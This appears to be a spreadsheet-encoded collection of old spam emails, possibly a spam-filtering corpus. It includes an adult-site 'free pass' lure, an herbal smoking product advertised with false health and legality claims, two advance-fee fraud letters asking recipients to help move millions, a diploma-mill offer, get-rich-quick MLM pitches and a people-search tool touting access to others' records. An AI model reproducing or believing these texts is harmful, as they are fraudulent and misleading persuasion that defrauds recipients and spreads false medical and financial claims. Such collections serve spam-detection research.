t into these sites for free. Why would you pay for a membership to an adult site with out knowing what they really have to offer? It's kind of like going on a blind date, you don't really know what to expect! I have top a adult sites you can become a member to for FREE.TRUTHThese directions are common sense, but some people still haven't figured it out! I have found a pay site offering free passes. So if you get a free pass imagine all the movies you can download onto your hard drive. All %100 free. These sites all have more movies, chat rooms, and hot pictures than any other porn sites I have come across to date. They are all A+ porno sites.All %100 free.DIRECTIONSFollow these 6 simple steps and you'll get a free pass into an adult paysite. Note that these passes are not permanent, but they're free and it takes less than two minutes to get in.STEP 1:Â  Scroll down the page &amp; click on the Web site banner below that interests you most.&amp;nb
sp;The descriptions and the links are below. Pick the one you want to get your 1st free pass to.STEP 2:Â  Once you arrive at the site you have selected, fill out the form, then click the submit button that says "GIVE MY FREE PASS". Remember to wait several seconds for the entire page to load. If you are on a dial up modem it will take a minute to process the page.STEP 3:Â  This will take you to the second join page. Fill in the required information. This is not some second rate site run by couple scumbags, these are multi-million dollar operations with policies and rules. They won't charge you for the free pass. Don't believe me? Read their Terms and Conditions.STEP 4:Â  After you have filled out the rest of the form........click the SUBMIT button! Only hit it one time! Wait one or two minutes, it will send the username and password to your e-mail account. That's it, within minutes you will have a free passSTEP 5:Â  That's i
t! That's all there is to it. Like I said before read the terms and conditions for yourself so you feel comfortable with it .This method of getting a free pass is best described as cutting out the middle man.Â Click or Copy &amp; Past this Free Pass Link: http://www.luckyamateurwives.comÂ Â qydosdypylfnjyrqwhwtcbjdtujmvgwh</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From the ethnobotanical herbalists who brought the herba supplementals; Kathmandu Temple Kiff â€œ1â€ &amp; â€œ2â€ â€œPersonal-Choiceâ€,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Herba.Now Open Seven Days A Week!  Call 1-623-974-2295 and Get the 2 for 1 Deal ! 10:30 AM to 7:00 PM (Mountain Time)
*********************************************************************************We are finally able to offer for your â€œSensitive/Responsiveâ€, â€œPersonal Choiceâ€ Smoking Enjoymentâ€¦.the â€œSeventh Heavenâ€ Temple â€œ3â€ Ragga Dagga (TM) Pipe-Smoking Substance Supplemental Productâ€¦. Introduced after three years of research and development; Temple â€œ3â€ is â€œPersonal Choiceâ€ legal Smoking/Indulgenceâ€¦.Redefined!!!  Thanks to recent, dramatic, technological advances in the laboratorial processes for the extraction of alkaloid and glycocide supplements from botanicals/herbas/plant matter, we are now able to offerâ€¦.in more cultivated/enhanced/viripotent/substantiated formatâ€¦.what had actually already been the most significant, lawful, â€œPersonal Choiceâ€ smoking substance available on the planetâ€¦.  â€œSeventh Heavenâ€ Temple â€œ3â€ Ragga Dagga (TM) is the sweet, sweet evolution of all of thatâ€¦. * A 20 X MORE VIRIPOTENT HERBA SUPPLEMENT THAN ITS PREDESSORS (TEMPLE â€œ1â€ &amp; â€œ2â€).* HAPPIER, HAPPY SMOKING!!!* INDEED, A DEPRESSIVE REGRESSIVE, SUPPLEMENTAL MOOD-ENHANCER.* MORE SOPHISTICATED, UPLIFTING &amp; POISED THAN ILLEGAL SMOKING  SUBSTANCES.* NO REGULATION, NO ILLEGALITY, NO FAILED DRUG TESTS!!!* INHIBITS STRESS AND ANXIETYâ€¦.* INSPIRES CONTEMPLATIVENESS &amp; CREATIVITYâ€¦.* ENHANCES THE SEXUAL EXPERIENCE!!!* GENERATES MORE RESTFUL SLEEP &amp; LUCID DREAMINGâ€¦.* A SIGNIFICANT HERBA / BOTANICAL SUPPLEMENT IN THE BATTLES AGAINST DRUG AND ALCOHOL DEPENDENCE!!!!* EASILY IGNITED &amp; STOKED.* SMOKES SWEETLY! * ABSOLUTELY LEGAL / NON-INVASIVE / NO DOWNSIDE!!!* LINGERS FOR A GOOD, GOODLY WHILE!* POSSESSES MANY FINE GANJA VIRTUES WITH NONE OF THE NEGATIVES!!!* JUST A LITTLE SNIPPET / PINCH GOES A LONG, LONG WAYâ€¦.JUST 4 OR 5 DRAWS OF YOUR PIPE (A traditional hand herb-pipe is included with each package of Ragga Dagga).Temple â€œ3â€ Ragga Dagga (TM) is an exclusive, botanical/herba, proprietary; Nepalesian formulated, ultra-â€œSensitive/Responsiveâ€,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lives.ABSOLUTELY LEGAL!  MARVELOUSLY POTENT!!A one-of-a-kind, proprietary amalgamation, comprised of extreme high-ratio concentrated extracts which are derived from various common and uncommon â€œsensitive/responsiveâ€ herbas primarily cultivated within and imported from the southern and eastern hemispheres; Temple â€œ3â€ Ragga Dagga (TM) high-ratio factored botanical extractions are master-crafted into solid jiggets/bars which are structurally reminiscent of what one might find in the â€œhappinessâ€ coffee and tea houses of Nepal/Kathmandu/Amsterdam and in many aspects, possesses a more collected and more focused, less scattered ambiance.  Ingredients:Temple smoking substances and Temple â€œ3â€ Ragga Dagga (TM) have always been and will always remain exclusive EXOTIC BOTANICAL RESOURCES â€œHouse Smoking Substance Specialtiesâ€.  Temple â€œ3â€ Ragga Dagga (TM) is both a euphonious/celebratory and relaxing/calming pipe-smoking substance that offers both physical and cerebral significators.  Temple â€œ3â€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â€œ3â€ Ragga Dagga (TM) is an absolutely legal, herba/botanical, â€œPersonal Choiceâ€, pipe-smoking substantiality product!!!  No included botanical factor therein is regulated by law or considered to be harmful by regulatory agencies.  There is no tobacco in Temple â€œ3â€ Ragga Dagga (TM).  There is certainly no cannabis/marijuana in Temple â€œ3â€ Ragga Dagga (TM)â€¦.  And although we are not age-governed by lawâ€¦.Temple â€œ3â€ Ragga Dagga (TM) is intended exclusively for sophisticated adult usage! Subsequently, it is our MANDATORY ethical policy that Temple â€œ3â€ Ragga Dagga (TM) may not be sold, offered, or given to any person that has not attained at least twenty-one years of age.  All things in their timeâ€¦.  As well, Temple â€œ3â€ Ragga Dagga (TM) is not intended for use during work or while driving.  It should not be enjoyed during pregnancy nor is it intended to supercede physicianâ€™s care in any regard.========================================================
Here is what our customers are saying about the Temple â€œ3â€ Ragga Dagga (TM) phenomenon:
â€œThank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you.â€-- Frankie R.Location: West Coast, USAâ€œIâ€™m a man of my 40â€™s and I really know my stuff.  I donâ€™t drink or do illegal drugs anymore and have found a much more spiritual path.  I used to have to take Valium in the past.  Not anymore with the Temple â€œ3â€.  It really amazes me how this stuff tastes like the Lebanese and blonde stuff I used to smoke in the 70â€™s.  I am very satisfied with all of your products.  I like them a lot and will be a customer for life for sure.  Whoever makes this stuff is an ARTIST at it.  Who would have thought?!â€  -- A.J.Location: United Kingdom
========================================================
Finally, we realize of course that this Temple â€œ3â€ Ragga Dagga (TM) is not inexpensiveâ€¦. (Temple â€œ3â€ Ragga Dagga (TM) is a very, very Sweet Smoke and â€œsweetnessâ€ is never acquired inexpensively.  Such is the way of the Economic Tao....), nor, as a matter of fact, is it inexpensive for us to acquire, factor or master-craftâ€¦.  Quite simply, it is the very best of its Kind that there is to be acquired.  Just a snippet/pinch of this Temple â€œ3â€ Ragga Dagga (TM)â€¦. Four or five draws of your pipeâ€¦.as is the magical wayâ€¦.lingers for a good, goodly while!!!  (An herb pipe and usage instructions are included with each Temple â€œ3â€ Ragga Dagga (TM) Package.)â€œSeventh Heavenâ€ Temple â€œ3â€ Ragga Dagga (TM) is offered exclusively in 56 gram (2 oz.) and 22 gram (.75 oz.) jiggets/bars for $115.00 and $65.00 respectively.  Sorry, no volume discounts.  Wholesale pricing is available to qualified, select merchants only.************************************************************
Our other fine herbal, botanical products include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
*********************************************
Sweet Vjestika Aphrodisia Drops (tm) inspires and enhances:* Extreme body sensitivity
* Sensitivity to touch
* Desire to touch and be touched
* Fantasy, lust, rapture, erogenous sensitivity ... 
* Prolongs and intensifies foreplay, orgasm &amp; climax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***********************************************Extreme Martial Arts Botanical RemediesEastern culture has long had a treatment for bone, muscle, tendon, ligament, sinew and joint distress, traumas, afflictions and constrictions.  We are pleased to offer   Equivalence Tablets  &amp;  Dragon Wing Remedy Spray
    (Hei Ping Shun)           (Hei Long Chibang)PLEASE NOTE:While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least:1.  Significantly reduce discomfort and pain!
(In many instances most, if not all, traumas and distress can be eliminated!)2.  Significantly increase mobility and strength ratio.
(Please remember also the significance of proper diet, excercise, rest and prayer.)Equivalence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!!!!Please refer to Introductory Offers further on in this text featuring Temple â€œ3â€ Ragga Dagga (TM) along with our other â€œvery fineâ€ â€œSensitive/Responsiveâ€ cordial botanical productsâ€¦. Please enjoy!!!  Many Blessings to you allâ€¦.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$130.005.    Equivalence Tablets - Each bottle contains 90 - 500mg tablets.
**  3-pack  (270 tablets)    $83.00
**  6-pack  (540 tablets)    $126.00 (save $40.00)
**  9-pack  (810 tablets)    $159.00 (save $90.00)
**  12-pack (1,080 tablets)  $192.00 (save $140.00)6.    Dragon Wing Spray Remedy - Each spray bottle contains 4 liquid oz.
**  3-pack  (3 - 4 oz. bottles)     $83.00
**  6-pack  (6 - 4 oz. bottles)     $126.00 (save $40.00)
**  9-pack  (9 - 4 oz. bottles)     $159.00 (save $90.00)
**  12-pack (12 - 4 oz. bottles)    $192.00 (save $140.00)7.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Do Not Forget To Ask for the 2 for 1 Special !
Call Now 1-623-974-2295 ASK  FOR THE DEAL !!ORDERING INFORMATION:
For your convenience, you can call us direct with your orders or questions.
 7 Days a Week -- 10:30 AM to 7:00 PM (Mountain Time)
To place an order via credit card or for customer assistance &amp; product information, please call 1-623-974-2295    (all orders are shipped next day via US Postal domestic and international Priority Mail)â€¦ Beyond business hours, please enjoy automated convenience.  Leave your name and phone number and a convenient time to return your call.  Certainly, we will be happy to do soâ€¦. Thank you for your kind attention.  
For all domestic orders, add $6.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $20.00 for International orders.**************************************************====================================================To remove your address from our list, click "Reply" in your email software and type "Remove" in the subject field, then send. 
 </t>
  </si>
  <si>
    <t>Do you Have an Inkjet or Laser Printer?Â 
        Do
        you Have an Inkjet or Laser Printer?Yes? Then we can SAVE
        you $$$ Money!
Our High Quality Ink &amp; Toner Cartridges come
        with a money-back guarantee, a 1-year
        Warranty*, and get FREE 3-Day SHIPPING!*
and best of all...They Cost
         up to 80%  Less
        than
        Retail Price!-&gt;-&gt;
        Click here
        to visit Our Website! &lt;- or Call us Toll-Free
        anytime at 1-800-758-8084
*90-day warranty on remanufactured
        cartridges. Free shipping on orders over $40
Â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t>
  </si>
  <si>
    <t xml:space="preserve">
New Page 1
80 to 95%
BELOW WHOLESALENEW, AND IN QUANTITIES YOU NEED
A SINGLE UNIT, A PALLET,
  OR A TRUCKLOAD1. Are you still looking for a very Real Business that can provide you and
  your family with the lifestyle you desire? Or,just a second income in your
  spare time?2. Would you invest $66.50 (A 33% discount off of our regular price of
  $99.95 during this limited time promotion. ) in a business that could make you
  "FINANCIALLY SECURE" by buying at up to 95%
  below wholesale and selling at 100 to 500%+ over your cost ?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"the
  plastic in their wallets determines the quality of their lives."The hard facts show that our economy has moved from the industrial age
  into the INFORMATION, SERVICE AND RETAIL AGE. No longer can you depend on the
  corporation to provide your family with job security. We all need a backup
  plan.If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suppliersÃ¿FFFF92 websites and specials pages, with email
  addresses, phone and fax numbers, and their current HOT
  listings. Unlike othersÃ¿FFFF92 distribution businesses where you are provided with
  WHOLESALE CATALOGS, out of date CD's, or lists of Government Auctions that
  sell Jeeps for $10, (which are a myth), we provide an unlimited virtual
  database of items at up to 95% below wholesale from liquidators, not
  wholesalers, that is up-dated on a weekly/daily basis by the suppliers. And
  the products are available for immediate purchase and shipping to you, and
  guarantee our product for 30 days with a full refund guarantee if it is not
  what we say.
This database is designed for the individual or a small business. Although
  there are suppliers in this database selling in large quantities, most are
  selected for their flexability in being willing sell in smaller
  quantities at great savings (80 to 95% Below Wholesale)
You will be able to buy such items as RCA Stereos that retail for $250.00+
  for$10 to $20.00, New Boom Boxes for $12.50 each, Palm Pilots for $39.00, Cell
  Phone Antenna Boosters that sell on TV for $19.95- - for .16 cents, Perfect
  Pancake makers as seen on TV for $19.95, for$6.50, CDÃ¿FFFF92s for $0.75 each,
  Pentium computers for as little as $11.00, or Computer Software that retails
  up to $74.99 for $0.50 each.If you would like to see some sample listings and featured specials, please
  email us at moreof80to95@themail.com
You may purchase this database:By Credit Card: At PayPal to the account of datapaid2000@yahoo.comBy Phone with Credit Card at 502-741-8154
Check by Fax To:
Specialty Products 502-244-1373(Just write a check and fax it to the above number, NO NEED TO MAIL)(Please include email address for the transmission of database.)By Mail:
Specialty Products
210 Dorshire Court
Louisville, KY 40245(Please remember to include a valid email address for the transmission of
  the Database)For your protection, we provide a 30 DAY, 100%
  MONEY BACK, SATISFACTION GUARANTEE, if we have misrepresented our
  product.
What do you get for your $66.50 investment:
  During Promotion A, fully executable, database (within 24 hours, or less) of
  100Ã¿FFFF92s of suppliers with hyperlinks to their websites, fax and phone numbers
  and a description of what type of product they handle and current product
  specials.And, "On-going telephone support during normal business hours."Since this is such a fast changing business, with new products being added
  and deleted on a weekly or even a daily basis, all data will be provided
  within 24 hours of receipt of payment via email file transfer. ( no waiting or
  shipping and handling costs) The $66.50 is your total
  one time cost. (During Promotion)
This DATABASE is for individuals who recognize an opportunity to make a
  substantial income. Keep in mind, everyone likes a bargain, and even more so
  when the economy is down. So, even if you just want to buy for your own use, a
  single purchase could repay your initial investment. And, remember we provide
  a 30day, full refund satisfaction guarantee.
We know that this has been a brief description, and you may want
  additional information. You may email us at moreof80to95@themail.com
  for additional information and a sample of listings currently being offered by
  various suppliers. (If you give us some idea of what
  types of products interest you, we will try to include some sample listings of
  those products.)We look forward to being of service in your new venture.Specialty Products
takeoffemaildatabaseclickhere
</t>
  </si>
  <si>
    <t>Greetings!You can earn up to 10K per week doing simple 
online tasks with a brand new system called EMM? It blows MLM away:No selling...
No recruiting...
No explaining or answering difficult questions...
No 3-way calling...
No begging friends and family...
No rejection... All you have to do is advertise, advertise, 
advertise and then enter the e-mail addresses 
of your prospects into a full-time automated 
system. This system:=  does ALL of your support,
=  answers ALL of the email from your group members,
=  handles ALL of your correspondence
=  works day and night to turn your advertising 
   into residual income!It is absolutely phenomenal!To get the full details, please put "Send EMM Info"
in subject line, then send to the address below:mailto:tim1@btamail.net.cn?subject=Send_EMM_InfoThank You!
PS: Removal Instruction - Just click below and send.
mailto:ma5s@yahoo.com?subject=Remove_Please
9779kl5</t>
  </si>
  <si>
    <t xml:space="preserve">Norton AD
Â 
      ATTENTION:
            This is a MUST for ALL Computer Users!!!
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diagnostics!Â 
6
Feature-Packed Utilities
1
 Great
            Price             A $300+  Combined Retail Value
            YOURS for Only $29.99!
&lt;Includes
            FREE Shipping!&gt;
 Don't fall prey to destructive viruses
    or hackers!ProtectÂ  your computer and your valuable  information
    and
-&gt;
            CLICK HERE to Order Yours NOW! &lt;-
Click
      here for more information
Â Â Â Â Â Â Â 
      Your
      email address was obtained from an opt-in list. Opt-in MRSA List
      Â Purchase Code # 312-1-010.Â Â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
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear debbiee ,Legal Services for Less than a Penny Per Day          You can have a Top Law Firm in your area produce a 
          Will for you, absolutely FREE, with your membership.
          					ï¿½ Â Unlimited Legal Consultations
					ï¿½ Â Unlimited Phone Conversations
					ï¿½ Â Traffic Ticket Defense
					ï¿½ Â Contract &amp; Document Review
					ï¿½ Â Letters and Calls Made on Your Behalf
					ï¿½ Â IRS Audit Protection
					ï¿½ Â Trial Defense
					ï¿½ Â Business &amp; Family Protection
					ï¿½ Â Much More...
				Why pay $200 or more an hour 
            when you can get the same first rate service 
            for less than $1 per day?
Get your FREE INFORMATION by clicking on the link below.CLICK HERE FOR MORE INFORMATIONIf you feel that you have received 
this offer in error, or if you wish to unsubscribe, 
please
Click Here.
 [PO1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve"> fork ,From;Mr.David  Kargbou and Family,
         Johannesburg,South Africa.My Dear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
My name is Mr.David  Kargbou,the second son of Mr.Smith Thabo Kargbou,of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
 st undemocratic elections decided to block and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
During my fathers life on earth,he had deposited the sum of Seven Million and Four Hundred Thousand United States Dollars[$7.400.000.00]in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
 ked by the present Mugabe's regime.My mother is presently with the valid document covering this deposit.Now this is what I actually want you to do for me;1. I want you to be presented to the Finance and Security company as the person I contacted to assist my family for this purpose, with whose name and adress myself and my mother will forward to them their office in the Republic of Togo as the person that will clear this money when they lift it out to their europe office.
2. To finally assist me in accommodating and managing this money in any lucrative business in your country for at least three years. 
Please,I hope you will grant and view this very request with favour and much understanding of our situation now,and will be a very honest and reliable person to deal with.And also bearing in mind the confidential nature of this my request,I emphasize please that you keep every bit of it to yourself so as to protect my familys future and yourself rendering this help.Thanking you in anticipation of your urgent response as soon as you read this very request.Best Regards, Mr.David Kargbou and family. 
http://xent.com/mailman/listinfo/fork
</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</si>
  <si>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report:http://www.information-depot.com/EuroExchange/In addition to our currency report, you can receive
our FREE INVESTMENT PACKAGE:*  Learn how $10,000 in options will leverage $1,000,000 in
Euro Currency. This means even a small movement in the market
has huge profit potential.If you are over age 18 and have some risk capital, it's
important that you find out how the Euro will
change the economic world and how you can profit!CLICK NOW! http://www.information-depot.com/EuroExchange/$10,000 minimum investmentPlease carefully evaluate your financial position before
trading.  Only risk capital should be used.http://www.information-depot.com/takemeoff/ To OptOut.
</t>
  </si>
  <si>
    <t xml:space="preserve">Norton SystemWorks 2002Software Suite
Professional Edition6 Feature-Packed Utilities, 1 Great Price
A $300.00+ Combined Retail Value for  Only $29.99!Protect your computer and your valuable information!
Don't allow yourself to fall prey to destructive viruses!
CLICK HERE FOR MORE INFO AND TO ORDER
If you wish to unsubscribe from this list, please  Click Here to be removed.
</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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">When America's top companies compete for your business, you win.http://getit.routeit21.com/sure_quote/Take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http://getit.routeit21.com/sure_quote/
"...was able to get 3 great offers in
less than 24 hours." -Jennifer C"Met all my needs... being able to search
for loans in a way that puts me in control." -Robert T."..it was easy, effortless...!"-Susan A. Click here to delete your address from future updates.
http://getit.routeit21.com/sure_quote/rm/-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">We ship worldwide within 24 hours!No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internz
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi !My name is Wayne Harrison and I would like to share a
genuine, NO RISK opportunity with you.What I have to share with you is not like any other internet
opportunities you have seen before. It is first and foremost
a CONSUMER OPPORTUNITY.It also offers you the ability to have a share of a
new Internet Mall to buy at wholesale for yourself
or to send others and make commissions on their
purchases.Besides this, it also offers a unique networking program
using a principle we call "REFERNET" Marketing. This is no
"get rich quick" scheme, but rather a credible
and realistic way to save money and gradually develop
what can become a large, recurring residual income.What's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space.To get your free membership and to learn more about
the DHS Club and our exciting REFERNET Marketing
Program and Postlaunch, visit my web page at
http://letscreatebiz/whjoinfree  
Remember, you have nothing to lose and potentially a lot to gain!
Best Regards,Wayne Harrison
To be removed from future mailings, simply
respond with REMOVE in the subject line.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Just sent you a note with the wrong link. Tthe correct one is http://letscreatebiz.com/whjoinfree  It is worth a minute of your time to check it out.
Remember, you have nothing to lose and potentially a lot to gain!
Best Regards,Wayne---------------------------------------------------
To be removed from future mailings, simply
respond with REMOVE in the subject line.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â  
Â 
 Hi 
                  Jm, 
Thanks 
                    for visiting http://www.seekercenter.net. 
Over 
                    90% web surfers use search engines to locate their needed 
                    info nowadays, so your web site is only effective when people 
                    can find it. If you are not listed on search engines - you 
                    lose. Nobody shows up no matter how attractive you made your 
                    site. As well, the investment you made in building it will 
                    not yield any dividends at all!
As 
                    a popular site promotion tool, SeekerCenter uniquely submits 
                    your website to 500,000+ search engines and directories worldwide, 
                    attracting great traffic to your business website. 
If 
                    you wish someone could step you through SeekerCenter WebPromoter 
                    program, you can check at http://www.seekercenter.net/faq.php. 
If 
                    you'd like to view to which search engines &amp; directories 
                    we submit your web site, please check http://www.seekercenter.net/engines.php. 
Questions 
                    or comments? Contact Vanessa@seekercenter.net 
                    for more information.
Sincerely,
                    Vanessa Linter
                    Customer Service
http://www.seekercenter.net 
Â 
</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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">U N I V E R S I T Y    D I P L O M A SBachelors, Masters, MBA, and Doctorate (PhD)Obtain a prosperous future, money earning power, 
and the Admiration of all.Diplomas from prestigious non-accredited
universities based on your present knowledge
and life experience.No required tests, classes, books, or interviews.Bachelors, Masters, MBA, and Doctorate (PhD)
diplomas available in the field of your choice.No one is turned down.Confidentiality assured.CALL NOW to receive YOUR Diplomawithin days!!!1-212-613-1648
If you would like to removed from this list, please put your email address in the subject line at shimon_1@yahoo.com
</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</si>
  <si>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herejmd
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello
Dear Sir. 
I got your contact in cause of a seriouse search for a 
reliable foreign partner, which really made me to 
contact you for assistance in transfering my money to 
you for investement purpose. 
I'm Mr Ibrahim Jallow. the son of a late sierraleonian 
business man Mr Kulu Jallow..Who died two yaers ago 
when the revolutionary united front rebels 
(R.U.F)attacked our residence  in Makeni Sierra leone. 
Following the cease fire agreement which was reach 
last year with the help of United Nation peace keeping 
troops,I used the oppoturnity to leave the country 
with a very important document 
of(US$14.500.000m)Fourteen million Five Hundred 
Thounsand U.S Dollars deposited by my late father in 
security company in Dakar Senegal,under my name.this 
money was realised from diamond  export. 
Now' I'm searching for a trusted individual or foreing 
firm whom I can invest this money with  for I am!
 next 
of kin to these money.However I contact you based on 
your capability and vast knowledge on international 
commercial investement. For your assistance and 
co-opertion I will give you 15%of the total sum 
realised after the sucessfull transfer of this money. 
Please kindly communicate your acceptance of this 
proposal through this my e-mail address so that we can 
discuss the modalities of seeing this transaction 
through.I count on you greately for your assistance. 
Awaiting your earnest response With regards. 
Yours,faithfully.  
MR.Ibrahim.Jallow._____________________________________________________________________
Webdunia Quiz Contest - Limited Time Unlimited Fun.Log on to quiz.webdunia.com and win fabulous prizes.
India's first multilingual mailing system: Get your Free e-mail account at www.epatra.com
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear fma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
  </si>
  <si>
    <t xml:space="preserve">Hi Sweetie,Come See the most beautiful, sweet...--&gt;18 Year Old Girls Bare it ALL!&lt;--
http://freexmovies.net/mypic/*******************************************************
Remove Instructions:
This e-mail message is not spam or unsolicited.  This e-mail address has joined or requested information in the past.  If this is a mistake or 
you would prefer not to receive a free once a week adult web site announcement,  then... please visit the web page below, at anytime to be permanently removed from the list:http://remove.pwxx3.com
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">FORD SALUTES THE MILITARY.THIS OFFER IS EXTENDED EXCLUSIVELY TO ALL ACTIVE DUTY, RESERVE, RETIRED, MILITARY VETERANS AND THEIR DIRECT DEPENDANTS ONLY.** DELIVERY TO ANY MILITARY INSTALLATION OR THE CLOSEST PORT IS AVAILABLE. **ROLLING HILLS FORD, Inc. LOCATED IN CLERMONT, FLORIDA, IS OFFERING DURING THE MONTHS OF AUGUST AND SEPTEMBER 2002, A PERSONAL INVITATION.  FOR A LIMITED TIME, A SPECIALTY PERIOD SALES PROGRAM FOR THE ABOVE MENTIONED, WILL BE OFFERED, *UNADVERTISED TO THE GENERAL PUBLIC.*
CURRENT FORD INCENTIVES ARE ALSO HONORED *IN ADDITION* TO THIS MILITARY PROGRAM, INCLUDING REBATES UP TO $3000 DOLLARS OR 0.0% FINANCING ON SELECT VEHICLES.THIS OFFER INCLUDES PRE-OWNED VEHICLES.SPECIAL CREDIT SITUATIONS WILL BE GERNEROUSLY REVIEWED BY OUR FINANCE DIRECTORS.CONFORMATION CODE - MILITARY: 009AAKKY1109
THIS CODE MUST BE PRESENTED TO QUALIFY.EMAIL FOR DETAILS:davidm@rollinghillsford.comOR CALL FOR DETAILS:(352) 394-6161 , ext 1051
David Mitchell, I.T. Department
davidm@rollinghillsford.com
(352) 394 - 6161 EXT 1015
Rolling Hills Ford
Clermont Florida 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
3Â 3.5% FIXED PAYMENT 30 YEARS
Â Â 
Lenders
make
you wait...They Demand to Interview you...
They Intimidate you...They Humiliate you...
And All of That is While They Decide If They Even Want to
Do Business With You...We
Turn the Tables on Them...
Now, You're In ChargeJust Fill Out Our Simple Form and They Will Have to
Compete For Your Business...http://www.1strefinance.com/apply.htm
We
have hundreds of loan programs, including:
Purchase
Loans
Refinance
Debt Consolidation
Home Improvement
Second Mortgages
No Income VerificationÂ http://www.1strefinance.com/apply.htm
If
you no longer wish to receive any of our mailings you may be
permanently removed by mailto:info@lenderscompete4you.com
If there has been any inconvenience we apologize.</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</si>
  <si>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3150uZPl9-590vitx5246frtb3-709rjXf0830sGEc0-646mzXg0950l52</t>
  </si>
  <si>
    <t xml:space="preserve">Dear melbwireless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old.To unsubscribe: send mail to majordomo@wireless.org.au
with "unsubscribe melbwireless" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">Want the most bang for your buck? Take your web site to the next level with a fast, powerful and yes cheap web hosting account.We targeted mainly to self-employed individuals and small companies on a budget which aren't going to pay inflated  prices for webhosting.Just getting started with a web site? Ready to host with your own domain name - www.mysite.com? Maybe, you already have a website and you are tired of paying too much for hosting? Starting as low as $0.04/day PLUS FREE Setup and one Month Hosting for FREECheck it out now @ http://srd.yahoo.com/drst/20834/*http://www.fabulousmessage.com/cgi-bin/enter.cgi?marketing_id=fab002This email was sent to you because your email is part of a targeted opt-in list. If you do not wish to receive further mailings from this offer, please click below and enter your email to remove your email from future offers.****************************************************************Anti-SPAM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Click to remove @ http://srd.yahoo.com/drst/20834/*http://www.spambites.com/cgi-bin/enter.cgi?spambytes_id=1214578**************************************************************** </t>
  </si>
  <si>
    <t xml:space="preserve">Online Credit BreakthroughÂ Â Repair Your Credit Online!KYx6YrKNxFfE3G4xFe7QLBMT5eAe4KbEtPqIbvbFDovYiEBdA5M72xZCu8nTPuwoEC6ZbMz3vGpThat's right - You can now access + clear up bad credit ONLINE  -Directly from the comfort + convienience of your computer!Watch your credit daily, with REAL TIME UPDATES Get the information you need quickly and efficently to remove negative credit items from your report!Click Here For More InformationThank you - The Web Credit (tm) Team! KYx6YrKNxFfE3G4xFe7QLBMT5eAe4KbEtPqIbvbFDovYiEBdA5M72xZCu8nTPuwoEC6ZbMz3vGp
</t>
  </si>
  <si>
    <t xml:space="preserve">Aware            8sLLCovering All 50 StatesÂ 
Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â 
             July 29, 2002Â 
Â 
Â Â 
            Â 
Â 
Â 
Covering
                     All 50 States
3
                     Executive Park Drive
Floor 18
Newport
                     Beach,Â CA
                     Â 92661
Wholesale
                     MortgageÂ 
Office:
                     866-860-6596
Fax:
                     714-844-4897
Email:
                     Cohen@GMMortgage.comÂ 
Â Jack
            Cohen and Loan Officers - Promotion
Â Â  "5
        Days!"Â Â Â Â Â Â Â Â Â Â Â Â Â 
We
will beat any
Mortgage
        Loan Rate.Â 
or
        callÂ 
(866)
        860-6596Â Â Â Â Â Â Name: *
Contact
            Phone: *Â 
State:Â 
            *
Credit
            Rating: 
Good (some lates)
Excellent (no lates)
Fair (collection)
Poor (bankruptcy)
Owed on 1stRate:
%*
Owed on 2nd 
Rate:
%Home Value:*
Amount
           Requested: *
What would you like
           to do?Â 
Â 
Licensing
         - Privacy
         - Terms of Use
Â©
         2002 US Sterns MortgageÂ  Corporation-Equal Housing
         OpportunityRemovehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Â 
Â 
To be removed from our subscriber list please
click here
Â 23</t>
  </si>
  <si>
    <t xml:space="preserve">Still believe you can earn $100,000 FAST IN MLM? GET REAL!GET EMM, A brand new SYSTEM that replaces MLM with something that WORKS! Start Earning 1,000's Now! Up to $10,000 per week doing simple online tasks.Free Info-  synergy@luxmail.com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  
</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Internet
                  Investigatorâ„¢
- New for
2002 -
Internet 
            Software for Online InvestigationsFind
                  Out Anything about Anyone
                  OnlineUncover 
                  Information about:
enemies,
debtors, 
                  neighbors, friends, employees, co-workers, your boss, yourself, 
                  associates, former school or military buddies, even a new love 
                  interest.
Become 
                  an Internet Investigator and explore an exciting new world of 
                  valuable information.With Internet Investigatorâ„¢ 
            you can investigate:
People, 
                  credit 
                  records, social security numbers, employment records, school 
                  records, criminal records, driving records, addresses, phone 
                  numbers (even some unlisted), hidden assets, family trees
and 
                  a whole lot more!
Click 
            Here for more Information
Â Unsubscribe Instructions
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
Â 
This message is a commercial 
          advertisement. It is in full compliance with all federal and state laws 
          regarding email advertising, including the California Business and Professions 
          Code. We have provided "opt out" email contact so you can 
          request to be taken off our mailing list. In addition we have placed 
          "Adv:" in the subject line to provide you with notification 
          in advance that this is a commercial advertisement. We do not wish to 
          send our advertising to anyone who does not wish to receive it. If you would rather not receive any further information from 
          us, please CLICK 
          to be taken off our list. In this way you can "opt-out" from 
          the list your email address was obtained from, whether it was "opt-in" 
          or otherwise. Please allow 5-10 business days for your email address 
          to beÂ processed and taken offÂ all lists in our control. Meanwhile, 
          delete any duplicate emails that you may receive and rest assured that 
          your request will be honored. If you have previously requested to be 
